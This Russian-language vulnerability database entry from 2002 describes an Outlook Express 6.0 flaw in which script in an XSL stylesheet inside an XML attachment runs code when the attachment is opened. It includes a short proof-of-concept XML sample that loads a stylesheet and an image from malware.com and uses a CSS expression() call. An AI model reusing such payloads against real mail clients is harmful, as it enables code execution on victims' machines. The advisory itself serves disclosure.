| Дата публикации: | 05.08.2002 |
| Всего просмотров: | 1127 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Обнаруженная уязвимость в Microsoft Outlook Express позволяет злонамеренному XML вложению выполнять произвольный код в контексте местной системы безопасности. Код будет выполнен при открытии вложения без всякого предупреждения. Уязвимость связанна с неправильной обработкой кода сценария включенного в XSL style, внедренного в XML документ. Обычно, информации XSL стиля не разрешается выполнение XML сценариев в пределах ограниченной зоны безопасности. Однако код сценария может быть выполнен, если он может определить местоположение каталога Temporary Internet File (TIF), который в свою очередь позволяет выполнение произвольного кода в пределах Local System security zone. Пример:
<?xml version="1.0" ?>
<?xml-stylesheet type="text/css"
href="http://www.malware.com/malware.css" ?>
<malware>
<h4 style="position: absolute;top:39;left:expression(alert
(document.location));font-family:arial;font-size:12pt;BACKGROUND-
IMAGE:url('http://www.malware.com/youlickit.gif');background-
repeat:no-repeat;background-position: 100 30;z-index:-
100;height:200pt;width:400pt;font-family:Verdana;color:red">sure it
can, malware says so</h4>
</malware>
Уязвимость обнаружена в Microsoft Outlook Express 6.0
|
| Ссылки: | WHERE'S THE CA$H: Internet Explorer 6.00. Outlook Express 6.00 |